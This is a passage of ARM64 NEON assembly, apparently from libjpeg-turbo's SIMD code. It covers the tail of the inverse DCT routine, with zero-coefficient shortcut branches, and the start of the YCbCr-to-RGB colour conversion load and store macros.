mul v5.8h, v5.8h, v21.8h
add TMP4, xzr, TMP2, LSL #32
mul v6.8h, v6.8h, v22.8h
mul v7.8h, v7.8h, v23.8h
adds TMP3, xzr, TMP2, LSR #32
mul v8.8h, v8.8h, v24.8h
mul v9.8h, v9.8h, v25.8h
b.ne 3f
/* Right AC coef is zero */
dup v15.2d, v10.d[1]
/* Even part: reverse the even part of the forward DCT. */
add v18.4h, v4.4h, v8.4h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.4h, v2.4h, v6.4h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
sub v26.4h, v2.4h, v6.4h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1l z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sshll v22.4s, v22.4h, #(CONST_BITS) /* tmp0l tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v20.16b, v18.16b /* tmp3 = z1 */
sshll v26.4s, v26.4h, #(CONST_BITS) /* tmp1l tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal v18.4s, v8.4h, XFIX_N_1_847 /* tmp2l tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
smlal v20.4s, v4.4h, XFIX_P_0_765 /* tmp3l tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
add v2.4s, v22.4s, v20.4s /* tmp10l tmp10 = tmp0 + tmp3; */
sub v6.4s, v22.4s, v20.4s /* tmp13l tmp13 = tmp0 - tmp3; */
add v8.4s, v26.4s, v18.4s /* tmp11l tmp11 = tmp1 + tmp2; */
sub v4.4s, v26.4s, v18.4s /* tmp12l tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.4h, v9.4h, v5.4h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.4h, v7.4h, v3.4h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.4h, v9.4h, v3.4h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.4h, v7.4h, v5.4h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.4h, v22.4h, v24.4h /* z5 = z3 + z4 */
smull v10.4s, v9.4h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull v12.4s, v7.4h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull v14.4s, v5.4h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull v16.4s, v3.4h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull v26.4s, v26.4h, XFIX_P_1_175 /* z5l z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull v22.4s, v22.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull v24.4s, v24.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull v18.4s, v18.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull v20.4s, v20.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v10.4s, v10.4s, v18.4s /* tmp0 += z1 */
add v12.4s, v12.4s, v20.4s /* tmp1 += z2 */
add v14.4s, v14.4s, v20.4s /* tmp2 += z2 */
add v16.4s, v16.4s, v18.4s /* tmp3 += z1 */
add v10.4s, v10.4s, v22.4s /* tmp0 += z3 */
add v12.4s, v12.4s, v24.4s /* tmp1 += z4 */
add v16.4s, v16.4s, v24.4s /* tmp3 += z4 */
add v14.4s, v14.4s, v22.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v18.4s, v2.4s, v16.4s /* tmp10 + tmp3 */
sub v20.4s, v2.4s, v16.4s /* tmp10 - tmp3 */
add v22.4s, v8.4s, v14.4s /* tmp11 + tmp2 */
sub v24.4s, v8.4s, v14.4s /* tmp11 - tmp2 */
add v26.4s, v4.4s, v12.4s /* tmp12 + tmp1 */
sub v28.4s, v4.4s, v12.4s /* tmp12 - tmp1 */
add v14.4s, v6.4s, v10.4s /* tmp13 + tmp0 */
sub v16.4s, v6.4s, v10.4s /* tmp13 - tmp0 */
rshrn v2.4h, v18.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v3.4h, v22.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v4.4h, v26.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v5.4h, v14.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v2.8h, v16.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v3.8h, v28.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v4.8h, v24.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v5.8h, v20.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
mov v6.16b, v15.16b
mov v7.16b, v15.16b
mov v8.16b, v15.16b
mov v9.16b, v15.16b
b 1b
.balign 16
3:
cbnz TMP4, 4f
/* Left AC coef is zero */
dup v14.2d, v10.d[0]
/* Even part: reverse the even part of the forward DCT. */
add v18.8h, v4.8h, v8.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.8h, v2.8h, v6.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull2 v19.4s, v18.8h, XFIX_P_0_541 /* z1h z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sub v26.8h, v2.8h, v6.8h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
sshll2 v23.4s, v22.8h, #(CONST_BITS) /* tmp0h tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v21.16b, v19.16b /* tmp3 = z1 */
smlal2 v19.4s, v8.8h, XFIX_N_1_847 /* tmp2h tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
sshll2 v27.4s, v26.8h, #(CONST_BITS) /* tmp1h tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal2 v21.4s, v4.8h, XFIX_P_0_765 /* tmp3h tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
add v28.4s, v23.4s, v21.4s /* tmp10h tmp10 = tmp0 + tmp3; */
sub v31.4s, v23.4s, v21.4s /* tmp13h tmp13 = tmp0 - tmp3; */
add v29.4s, v27.4s, v19.4s /* tmp11h tmp11 = tmp1 + tmp2; */
sub v30.4s, v27.4s, v19.4s /* tmp12h tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.8h, v9.8h, v5.8h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.8h, v7.8h, v3.8h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.8h, v9.8h, v3.8h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.8h, v7.8h, v5.8h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.8h, v22.8h, v24.8h /* z5 = z3 + z4 */
smull2 v11.4s, v9.8h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull2 v13.4s, v7.8h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull2 v15.4s, v5.8h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull2 v17.4s, v3.8h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull2 v27.4s, v26.8h, XFIX_P_1_175 /* z5h z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull2 v23.4s, v22.8h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull2 v25.4s, v24.8h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull2 v19.4s, v18.8h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull2 v21.4s, v20.8h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v23.4s, v23.4s, v27.4s /* z3 += z5 */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v25.4s, v25.4s, v27.4s /* z4 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v11.4s, v11.4s, v19.4s /* tmp0 += z1 */
add v13.4s, v13.4s, v21.4s /* tmp1 += z2 */
add v15.4s, v15.4s, v21.4s /* tmp2 += z2 */
add v17.4s, v17.4s, v19.4s /* tmp3 += z1 */
add v11.4s, v11.4s, v23.4s /* tmp0 += z3 */
add v13.4s, v13.4s, v25.4s /* tmp1 += z4 */
add v17.4s, v17.4s, v25.4s /* tmp3 += z4 */
add v15.4s, v15.4s, v23.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v19.4s, v28.4s, v17.4s /* tmp10 + tmp3 */
sub v21.4s, v28.4s, v17.4s /* tmp10 - tmp3 */
add v23.4s, v29.4s, v15.4s /* tmp11 + tmp2 */
sub v25.4s, v29.4s, v15.4s /* tmp11 - tmp2 */
add v27.4s, v30.4s, v13.4s /* tmp12 + tmp1 */
sub v29.4s, v30.4s, v13.4s /* tmp12 - tmp1 */
add v15.4s, v31.4s, v11.4s /* tmp13 + tmp0 */
sub v17.4s, v31.4s, v11.4s /* tmp13 - tmp0 */
mov v2.16b, v14.16b
mov v3.16b, v14.16b
mov v4.16b, v14.16b
mov v5.16b, v14.16b
rshrn v6.4h, v19.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v7.4h, v23.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v8.4h, v27.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v9.4h, v15.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v6.8h, v17.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v7.8h, v29.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v8.8h, v25.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v9.8h, v21.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
b 1b
.balign 16
4:
/* "No" AC coef is zero */
/* Even part: reverse the even part of the forward DCT. */
add v18.8h, v4.8h, v8.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.8h, v2.8h, v6.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull2 v19.4s, v18.8h, XFIX_P_0_541 /* z1h z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sub v26.8h, v2.8h, v6.8h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1l z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sshll2 v23.4s, v22.8h, #(CONST_BITS) /* tmp0h tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v21.16b, v19.16b /* tmp3 = z1 */
mov v20.16b, v18.16b /* tmp3 = z1 */
smlal2 v19.4s, v8.8h, XFIX_N_1_847 /* tmp2h tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
smlal v18.4s, v8.4h, XFIX_N_1_847 /* tmp2l tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
sshll2 v27.4s, v26.8h, #(CONST_BITS) /* tmp1h tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal2 v21.4s, v4.8h, XFIX_P_0_765 /* tmp3h tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
smlal v20.4s, v4.4h, XFIX_P_0_765 /* tmp3l tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
sshll v22.4s, v22.4h, #(CONST_BITS) /* tmp0l tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
sshll v26.4s, v26.4h, #(CONST_BITS) /* tmp1l tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
add v2.4s, v22.4s, v20.4s /* tmp10l tmp10 = tmp0 + tmp3; */
sub v6.4s, v22.4s, v20.4s /* tmp13l tmp13 = tmp0 - tmp3; */
add v8.4s, v26.4s, v18.4s /* tmp11l tmp11 = tmp1 + tmp2; */
sub v4.4s, v26.4s, v18.4s /* tmp12l tmp12 = tmp1 - tmp2; */
add v28.4s, v23.4s, v21.4s /* tmp10h tmp10 = tmp0 + tmp3; */
sub v31.4s, v23.4s, v21.4s /* tmp13h tmp13 = tmp0 - tmp3; */
add v29.4s, v27.4s, v19.4s /* tmp11h tmp11 = tmp1 + tmp2; */
sub v30.4s, v27.4s, v19.4s /* tmp12h tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.8h, v9.8h, v5.8h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.8h, v7.8h, v3.8h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.8h, v9.8h, v3.8h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.8h, v7.8h, v5.8h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.8h, v22.8h, v24.8h /* z5 = z3 + z4 */
smull2 v11.4s, v9.8h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull2 v13.4s, v7.8h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull2 v15.4s, v5.8h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull2 v17.4s, v3.8h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull2 v27.4s, v26.8h, XFIX_P_1_175 /* z5h z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull2 v23.4s, v22.8h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull2 v25.4s, v24.8h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull2 v19.4s, v18.8h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull2 v21.4s, v20.8h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
smull v10.4s, v9.4h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull v12.4s, v7.4h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull v14.4s, v5.4h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull v16.4s, v3.4h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull v26.4s, v26.4h, XFIX_P_1_175 /* z5l z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull v22.4s, v22.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull v24.4s, v24.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull v18.4s, v18.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull v20.4s, v20.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v23.4s, v23.4s, v27.4s /* z3 += z5 */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v25.4s, v25.4s, v27.4s /* z4 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v11.4s, v11.4s, v19.4s /* tmp0 += z1 */
add v10.4s, v10.4s, v18.4s /* tmp0 += z1 */
add v13.4s, v13.4s, v21.4s /* tmp1 += z2 */
add v12.4s, v12.4s, v20.4s /* tmp1 += z2 */
add v15.4s, v15.4s, v21.4s /* tmp2 += z2 */
add v14.4s, v14.4s, v20.4s /* tmp2 += z2 */
add v17.4s, v17.4s, v19.4s /* tmp3 += z1 */
add v16.4s, v16.4s, v18.4s /* tmp3 += z1 */
add v11.4s, v11.4s, v23.4s /* tmp0 += z3 */
add v10.4s, v10.4s, v22.4s /* tmp0 += z3 */
add v13.4s, v13.4s, v25.4s /* tmp1 += z4 */
add v12.4s, v12.4s, v24.4s /* tmp1 += z4 */
add v17.4s, v17.4s, v25.4s /* tmp3 += z4 */
add v16.4s, v16.4s, v24.4s /* tmp3 += z4 */
add v15.4s, v15.4s, v23.4s /* tmp2 += z3 */
add v14.4s, v14.4s, v22.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v18.4s, v2.4s, v16.4s /* tmp10 + tmp3 */
add v19.4s, v28.4s, v17.4s /* tmp10 + tmp3 */
sub v20.4s, v2.4s, v16.4s /* tmp10 - tmp3 */
sub v21.4s, v28.4s, v17.4s /* tmp10 - tmp3 */
add v22.4s, v8.4s, v14.4s /* tmp11 + tmp2 */
add v23.4s, v29.4s, v15.4s /* tmp11 + tmp2 */
sub v24.4s, v8.4s, v14.4s /* tmp11 - tmp2 */
sub v25.4s, v29.4s, v15.4s /* tmp11 - tmp2 */
add v26.4s, v4.4s, v12.4s /* tmp12 + tmp1 */
add v27.4s, v30.4s, v13.4s /* tmp12 + tmp1 */
sub v28.4s, v4.4s, v12.4s /* tmp12 - tmp1 */
sub v29.4s, v30.4s, v13.4s /* tmp12 - tmp1 */
add v14.4s, v6.4s, v10.4s /* tmp13 + tmp0 */
add v15.4s, v31.4s, v11.4s /* tmp13 + tmp0 */
sub v16.4s, v6.4s, v10.4s /* tmp13 - tmp0 */
sub v17.4s, v31.4s, v11.4s /* tmp13 - tmp0 */
rshrn v2.4h, v18.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v3.4h, v22.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v4.4h, v26.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v5.4h, v14.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn v6.4h, v19.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS-PASS1_BITS) */
rshrn v7.4h, v23.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS-PASS1_BITS) */
rshrn v8.4h, v27.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS-PASS1_BITS) */
rshrn v9.4h, v15.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v2.8h, v16.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v3.8h, v28.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v4.8h, v24.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v5.8h, v20.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
rshrn2 v6.8h, v17.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS-PASS1_BITS) */
rshrn2 v7.8h, v29.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS-PASS1_BITS) */
rshrn2 v8.8h, v25.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS-PASS1_BITS) */
rshrn2 v9.8h, v21.4s, #(CONST_BITS - PASS1_BITS) /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS-PASS1_BITS) */
b 1b
.unreq DCT_TABLE
.unreq COEF_BLOCK
.unreq OUTPUT_BUF
.unreq OUTPUT_COL
.unreq TMP1
.unreq TMP2
.unreq TMP3
.unreq TMP4
.unreq TMP5
.unreq TMP6
.unreq TMP7
.unreq TMP8
#undef CENTERJSAMPLE
#undef CONST_BITS
#undef PASS1_BITS
#undef XFIX_P_0_298
#undef XFIX_N_0_390
#undef XFIX_P_0_541
#undef XFIX_P_0_765
#undef XFIX_N_0_899
#undef XFIX_P_1_175
#undef XFIX_P_1_501
#undef XFIX_N_1_847
#undef XFIX_N_1_961
#undef XFIX_P_2_053
#undef XFIX_N_2_562
#undef XFIX_P_3_072
/*****************************************************************************/
/*
* jsimd_ycc_extrgb_convert_neon
* jsimd_ycc_extbgr_convert_neon
* jsimd_ycc_extrgbx_convert_neon
* jsimd_ycc_extbgrx_convert_neon
* jsimd_ycc_extxbgr_convert_neon
* jsimd_ycc_extxrgb_convert_neon
*
* Colorspace conversion YCbCr -> RGB
*/
.macro do_load size
.if \size == 8
ld1 {v4.8b}, [U], 8
ld1 {v5.8b}, [V], 8
ld1 {v0.8b}, [Y], 8
prfm pldl1keep, [U, #64]
prfm pldl1keep, [V, #64]
prfm pldl1keep, [Y, #64]
.elseif \size == 4
ld1 {v4.b}[0], [U], 1
ld1 {v4.b}[1], [U], 1
ld1 {v4.b}[2], [U], 1
ld1 {v4.b}[3], [U], 1
ld1 {v5.b}[0], [V], 1
ld1 {v5.b}[1], [V], 1
ld1 {v5.b}[2], [V], 1
ld1 {v5.b}[3], [V], 1
ld1 {v0.b}[0], [Y], 1
ld1 {v0.b}[1], [Y], 1
ld1 {v0.b}[2], [Y], 1
ld1 {v0.b}[3], [Y], 1
.elseif \size == 2
ld1 {v4.b}[4], [U], 1
ld1 {v4.b}[5], [U], 1
ld1 {v5.b}[4], [V], 1
ld1 {v5.b}[5], [V], 1
ld1 {v0.b}[4], [Y], 1
ld1 {v0.b}[5], [Y], 1
.elseif \size == 1
ld1 {v4.b}[6], [U], 1
ld1 {v5.b}[6], [V], 1
ld1 {v0.b}[6], [Y], 1
.else
.error unsupported macroblock size
.endif
.endm
.macro do_store bpp, size, fast_st3
.if \bpp == 24
.if \size == 8
.if \fast_st3 == 1
st3 {v10.8b, v11.8b, v12.8b}, [RGB], 24
.else
st1 {v10.b}[0], [RGB], #1
st1 {v11.b}[0], [RGB], #1
st1 {v12.b}[0], [RGB], #1
st1 {v10.b}[1], [RGB], #1
st1 {v11.b}[1], [RGB], #1
st1 {v12.b}[1], [RGB], #1
st1 {v10.b}[2], [RGB], #1
st1 {v11.b}[2], [RGB], #1
st1 {v12.b}[2], [RGB], #1
st1 {v10.b}[3], [RGB], #1
st1 {v11.b}[3], [RGB], #1
st1 {v12.b}[3], [RGB], #1
st1 {v10.b}[4], [RGB], #1
st1 {v11.b}[4], [RGB], #1
st1 {v12.b}[4], [RGB], #1
st1 {v10.b}[5], [RGB], #1
st1 {v11.b}[5], [RGB], #1
st1 {v12.b}[5], [RGB], #1
st1 {v10.b}[6], [RGB], #1
st1 {v11.b}[6], [RGB], #1
st1 {v12.b}[6], [RGB], #1
st1 {v10.b}[7], [RGB], #1
st1 {v11.b}[7], [RGB], #1
st1 {v12.b}[7], [RGB], #1
.endif
.elseif \size == 4
st3 {v10.b, v11.b, v12.b}[0], [RGB], 3
st3 {v10.b, v11.b, v12.b}[1], [RGB], 3
st3 {v10.b, v11.b, v12.b}[2], [RGB], 3
st3 {v10.b, v11.b, v12.b}[3], [RGB], 3
.elseif \size == 2
st3 {v10.b, v11.b, v12.b}[4], [RGB], 3
st3 {v10.b, v11.b, v12.b}[5], [RGB], 3
.elseif \size == 1
st3 {v10.b, v11.b, v12.b}[6], [RGB], 3
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 32
.if \size == 8
st4 {v10.8b, v11.8b, v12.8b, v13.8b}, [RGB], 32
.elseif \size == 4
st4 {v10.b, v11.b, v12.b, v13.b}[0], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[1], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[2], [RGB], 4
st4 {v10.b, v11.b, v12.b, v13.b}[3], [RGB], 4
.elseif \size == 2
st4 {v10.b, v11.b, v12.b, v13.b}[4], [RGB], 4
